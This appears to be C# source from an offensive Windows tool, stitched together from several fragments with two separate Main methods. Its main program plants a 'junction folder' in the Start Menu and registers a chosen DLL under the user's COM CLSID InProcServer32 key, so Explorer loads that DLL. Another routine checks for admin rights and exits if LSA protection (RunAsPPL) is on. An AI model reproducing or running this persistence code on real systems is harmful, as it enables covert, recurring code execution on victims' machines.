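/// <summary>
/// Runs the checks that gate the rest of the tool: the caller must be in the
/// local Administrators role, the DLL's PE machine type is compared with the
/// detected host architecture, and the LSA protection (RunAsPPL) setting is read.
/// Results are reported on the console; the method returns early when the
/// caller is not an administrator or when RunAsPPL is enabled.
/// </summary>
/// <param name="dllPath">Path of the DLL whose machine type is inspected.</param>
/// <remarks>
/// An architecture mismatch is only reported here; it does not stop execution.
/// The detected host architecture is stored in the <c>osArch</c> member declared
/// outside this method.
/// </remarks>
public static void PreflightChecks(string dllPath)
{
    // WindowsIdentity wraps a token handle, so release it once the role check is done.
    bool isAdmin;
    using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
    {
        WindowsPrincipal principal = new WindowsPrincipal(identity);
        isAdmin = principal.IsInRole(WindowsBuiltInRole.Administrator);
    }

    if (!isAdmin)
    {
        Console.WriteLine("[-] You do not have admin privileges. Exiting.");
        return;
    }

    // Get OS arch.
    // NOTE(review): PROCESSOR_ARCHITEW6432 is only defined for a 32-bit process
    // running under WOW64 on 64-bit Windows, so it describes the current process
    // rather than the OS; a native 32-bit host also lands in the "x64" branch.
    // Behaviour is kept as in the original - confirm the intended meaning.
    if (!string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432")))
    {
        Console.WriteLine("[+] Detected x86 system architecture.");
        osArch = "x86";
    }
    else
    {
        Console.WriteLine("[+] Detected x64 system architecture.");
        osArch = "x64";
    }

    // Get DLL arch. dllArch stays null for any machine type not listed here.
    MachineType type = GetDllMachineType(dllPath);
    string dllArch = null;
    if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
    {
        Console.WriteLine("[+] Detected DLL x86 DLL architecture");
        dllArch = "x86";
    }
    else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
    {
        Console.WriteLine("[+] Detected DLL x64 DLL architecture");
        dllArch = "x64";
    }

    // Check for architecture match. The static Equals is null-safe, so an
    // unrecognised machine type is reported as a mismatch instead of throwing
    // a NullReferenceException.
    if (!string.Equals(dllArch, osArch))
    {
        Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's.");
    }

    // RunAsPPL is a value under the Lsa key, not a subkey of it. Opening it as a
    // subkey always yields null, which made the original check report "not set"
    // regardless of the real configuration. Read the value and dispose the handle.
    object runAsPPLData = null;
    using (RegistryKey lsaKey = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Lsa"))
    {
        if (lsaKey != null)
        {
            runAsPPLData = lsaKey.GetValue("RunAsPPL");
        }
    }

    // A missing value or a value of 0 both mean LSA protection is not enabled.
    string runAsPPLVal = Convert.ToString(runAsPPLData, System.Globalization.CultureInfo.InvariantCulture);
    if (String.IsNullOrEmpty(runAsPPLVal) || runAsPPLVal == "0")
    {
        Console.WriteLine("[+] RunAsPPL registry key not set!");
    }
    else
    {
        Console.WriteLine("[-] RunAsPPL registry key set. Exiting...");
        return;
    }
}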
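/// <summary>
/// Sample entry point: reads the PE machine type of a hard-coded DLL path,
/// prints the matching architecture label and waits for a key press.
/// </summary>
/// <param name="args">Command-line arguments; not used.</param>
static void Main(string[] args)
{
    MachineType type = GetDllMachineType("path/to/MyAssembly.dll");

    if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
    {
        Console.WriteLine("Dll architecture: x86/32bit");
    }
    else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
    {
        // AMD64 is the machine type of ordinary x64 images; the original tested
        // only IA64 (Itanium), so a typical 64-bit DLL printed nothing.
        // The IA64 case keeps its original label for compatibility.
        Console.WriteLine("Dll architecture: x64/64bit");
    }

    Console.ReadKey();
}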
/// <summary>
/// Maps the PE machine type of the file at <paramref name="path"/> to an
/// architecture label, prints it, stores it in the <c>arch</c> member and
/// returns that member.
/// </summary>
/// <param name="path">Path of the DLL to inspect.</param>
/// <returns>
/// "x86" for I386 images and "x64" for AMD64 images. For any other machine type
/// <c>arch</c> is left untouched and its current value is returned.
/// </returns>
public static string getArch(string path)
{
    MachineType machine = GetDllMachineType(path);

    string banner = null;
    string detected = null;

    if (machine.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
    {
        banner = "Dll architecture: x86/32bit";
        detected = "x86";
    }
    else if (machine.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
    {
        banner = "Dll architecture: x64/64bit";
        detected = "x64";
    }

    // Only a recognised machine type prints a line and overwrites arch.
    if (detected != null)
    {
        Console.WriteLine(banner);
        arch = detected;
    }

    return arch;
}
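/// <summary>
/// Entry point. Validates the single DLL-path argument, compares the DLL's PE
/// machine type with the detected host architecture, creates a folder whose
/// name ends in "Indexing." followed by the <c>guid</c> member, and writes the
/// DLL path as the default value of the per-user InProcServer32 key for that
/// identifier. Any failed step prints a message and exits with code 1.
/// </summary>
/// <param name="args">Exactly one element: the full path to the DLL.</param>
/// <remarks>
/// Artifacts this leaves on the host, useful for auditing and clean-up:
/// a directory under the per-user
/// <c>Microsoft\Windows\Start Menu\Programs\Accessories\</c> folder named
/// "Indexing." plus the identifier, and a default value under
/// <c>HKCU\SOFTWARE\Classes\CLSID\</c> identifier <c>\InProcServer32</c>
/// holding the DLL path. Both are per-user locations. The <c>guid</c> and
/// <c>osArch</c> members are declared outside this method.
/// </remarks>
static void Main(string[] args)
{
    if (args.Length != 1)
    {
        Console.WriteLine("[-] Usage: JunctionFolder.exe <full path to DLL>");
        Environment.Exit(1);
    }

    if (!File.Exists(args[0]))
    {
        Console.WriteLine("[-] DLL does not appear to exist on the system. Did you provide the full path?");
        Environment.Exit(1);
    }

    // NOTE(review): PROCESSOR_ARCHITEW6432 is only defined for a 32-bit process
    // running under WOW64 on 64-bit Windows, so this reflects the current
    // process rather than the OS. Behaviour kept as in the original - confirm.
    if (!string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432")))
    {
        Console.WriteLine("[+] Detected x86 system architecture.");
        osArch = "x86";
    }
    else
    {
        Console.WriteLine("[+] Detected x64 system architecture.");
        osArch = "x64";
    }

    // dllArch stays null for any machine type not listed here.
    MachineType type = GetDllMachineType(args[0]);
    string dllArch = null;
    if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
    {
        Console.WriteLine("[+] Detected DLL x86 DLL architecture");
        dllArch = "x86";
    }
    else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
    {
        Console.WriteLine("[+] Detected DLL x64 DLL architecture");
        dllArch = "x64";
    }

    // Null-safe comparison: an unrecognised machine type exits through the
    // mismatch path instead of throwing a NullReferenceException.
    if (!string.Equals(dllArch, osArch))
    {
        Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's.");
        Environment.Exit(1);
    }

    //Create the junction folder
    string implantDir = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"Microsoft\Windows\Start Menu\Programs\Accessories\");
    string target = implantDir + "Indexing." + guid;
    try
    {
        Directory.CreateDirectory(target);
    }
    catch (Exception e)
    {
        Console.WriteLine("[-] Unable to create the junction folder");
        Console.WriteLine(e);
        Environment.Exit(1);
    }

    // NOTE(review): the message abbreviates the location; the directory actually
    // created is the full path held in target, not %APPDATA% directly.
    Console.WriteLine("[+] Created junction folder at %APPDATA%/Indexing." + guid);

    //Set up the registry key
    string dllPath = args[0];
    string key = @"SOFTWARE\Classes\CLSID\" + guid + @"\InProcServer32";
    try
    {
        // CreateSubKey sits inside the try so a failure to open the key is
        // reported like a failed write, and using releases the handle on
        // every path.
        using (RegistryKey regkey = Registry.CurrentUser.CreateSubKey(key))
        {
            regkey.SetValue("", dllPath);
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[-] Could not write the registry key");
        Console.WriteLine(e);
        Environment.Exit(1);
    }

    Console.WriteLine("[+] Registry key written");
}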